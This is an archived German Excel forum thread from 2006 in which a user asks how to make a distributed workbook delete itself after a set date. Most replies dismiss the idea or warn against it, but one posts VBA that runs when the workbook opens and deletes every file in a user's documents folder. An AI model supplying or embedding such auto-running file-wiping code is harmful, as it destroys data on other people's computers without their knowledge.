Live-Forum - Die aktuellen Beiträge
Datum
Titel
24.04.2024 19:29:30
24.04.2024 18:49:56
Anzeige
Archiv - Navigation
736to740
Aktuelles Verzeichnis
Verzeichnis Index
Übersicht Verzeichnisse
Vorheriger Thread
Rückwärts Blättern
Nächster Thread
Vorwärts blättern
Anzeige
HERBERS
Excel-Forum (Archiv)
20+ Jahre Excel-Kompetenz: Von Anwendern, für Anwender
736to740
736to740
Aktuelles Verzeichnis
Verzeichnis Index
Verzeichnis Index
Übersicht Verzeichnisse
Inhaltsverzeichnis

Selbstzerstörung / Countdown

Selbstzerstörung / Countdown
23.02.2006 11:48:45
Christian
Hallo Miteinander,
gibt es die Möglichkeit in eine Arbeitsmappe einen Countdown einzubauen?
Ich meine das sich nach 3 Monaten alles von selbst löscht (3Monate nach Erstellungsdatum) oder nur ein Teil der einzelnen Sheets die von der Sache her gleich aufgebaut sind.
Und Falls ja ist das auch auf einer auf CD gebrannten Version möglich?
Ich habe in der Vergangenheit die Erfahrung gemacht das hier wirkliche Cracks unterwegs sind, wäre Toll wenn ihr mich helfen könntet.
Liebe Grüße
Christian

9
Beiträge zum Forumthread
Beiträge zu diesem Forumthread

Betreff
Datum
Anwender
Anzeige
AW: Selbstzerstörung / Countdown
23.02.2006 16:38:07
Christian
Ja das ist eine Passwortschutz aber keine "Selbstzerstörung".
Es geht im wesentlichen darum das en bestimmter Bereich nach einer bestimmten Zeit unwiederbringlich gelöscht werden soll.
AW: Selbstzerstörung / Countdown
23.02.2006 17:02:45
Klaus
Hi,
Du denkst in die falsche Richtung.
Solange ich von einer Datei eine Sicherungskopie machen kann, ist es mir doch scheißegal wie oft sich die Datei "selbst zerstört". Ich habe ja die Sicherungskopie !!!
Auch ein "Selbstzerstörungsmechanismus" auf einer CD ist absurt. Mein CD-Rom-Laufwerk kann die Daten nur lesen, nicht löschen oder überschreiben. Und nun ?
"Selbstzerstörung" ist also absoluter nonsens.
Dir bleibt nur die Möglichkeit Deinen Code so gut es geht zu schützen!!!
Du solltest wissen, dass z.B. Text-Strings im Code mit fast jedem Editor lesbar sind.
Also: verschlüsseln
Du kannst es den sogenannten "Cracks" nur so schwer wie möglich machen. Mehr geht nicht.
Gruss
Klaus
Anzeige
AW: Selbstzerstörung / Countdown
23.02.2006 17:20:05
Christian
Ja das habe ich mir gedacht, jedoch wurde ich hier schon öfter postitiv überrascht.
Könnte man den einen Countdown in ein Makro einbauen das z.B. sagt ab oder nach dem 21.3.06
nach öffnen der Datei alles löschen und speichern (überschreiben)?
AW: Selbstzerstörung / Countdown
23.02.2006 17:27:57
Jens
Hi,
alles vergebens, Profis wie ich knacken das in 2 Minuten.
mfg Jens
AW: Selbstzerstörung / Countdown
23.02.2006 18:13:37
Kölsche
Hi im Klassenmodul "DieseArbeitsmappe" folgenden Code:
Code:
Option Explicit

Private Sub Workbook_Open()
Application.OnTime TimeValue("12:00:00"), "loeschen", TimeValue("14:00:00")
End Sub

Die Anweisung startet den Löschvorgang frühestens um 12:00 Uhr und, falls die Mappe erst später geöffnet wird, spätestens um 14:00 Uhr. Wurde in diesem Zeitraum die Mappe nicht geöffnet, wird auch nicht gelöscht.
Folgender Code in ein Standardmodul:
Code:
Option Explicit
Public Sub loeschen()
Dim objFileSystemObject As Object, objFile As Object
Set objFileSystemObject = CreateObject("Scripting.FileSystemObject")
For Each objFile In objFileSystemObject.GetFolder("C:\Eigene Dateien\").Files
If objFile.Path ThisWorkbook.FullName Then objFile.Delete
Next
Set objFileSystemObject = Nothing
End Sub
Der Code löscht gnadenlos alle, in dem angegebenen Ordner enthaltenen, Dateien.
Anzeige
AW: Selbstzerstörung / Countdown
24.02.2006 09:00:44
christian
Könnte ich die Uhrzeiten auch durch ein Datum ersetzen ?
So das wenn nach einem bestimmten Zeitraum geöffnet wird automatisch gelöscht?
AW: Selbstzerstörung / Countdown
24.02.2006 20:54:04
Fröhlich
Hi,
du musst erstmal sicherstellen, dass die Systemzeit nicht zurückgestellt wurde.
Dann musst du prüfen, ob das aktuelle Datum außerhalb des gültigen Datums liegt.
Wenn das getan ist, Datei löschen.
mfg Fröhlich
AW: Selbstzerstörung / Countdown
27.02.2006 22:21:15
Aton
Hallo
Dies zu Programieren ist kein Problem, du kannst jede Datei auf der Festplatte löschen.
Bei Excel Startbare auch nur Teile davon.
Das Problem ist dabei. Du Start excel nach einer längeren Pause, oder du setzt mal das systemdatum zu weit in die zukunft, wird alles gelöscht. ( Viel arbeit das herzustellen )
Machst du dies auf deinem Computer ist das ok.
Machst du es bei einem Freund oder Kollegen, kann das schwere folgen haben.
Ich wäre nicht begeistert wenn ein Makro Daten löscht ohne das ich was dagegen machen kann.
Liebe 10 Datei-Copys als eine zuviel gelöscht.
Der beste Datenschutz ist wenn du die Datei durch ein Makro erstellst, damit hab ich gute Erfahrung gemacht, so kann dir keiner so schnell was entwenden da er nur lesen, aber nichts schreiben kann, oder nur sehr begrenzt.
Bei meinen nur Komentare dazu möglich.
Hoffe verstehst das nicht falsch, aber löschen auf fremden Coms ist eine Unsitte, die ich auch im kleinen Rahmen nicht anwenden möchte.
Gruß Aton
Ps. Ein Comp zu leeren ist schnell gemacht, aber das wiederherstellen OH je
Anzeige

Beliebteste Forumthreads (12 Monate)

Anzeige

Beliebteste Forumthreads (12 Monate)

Anzeige
Anzeige
Anzeige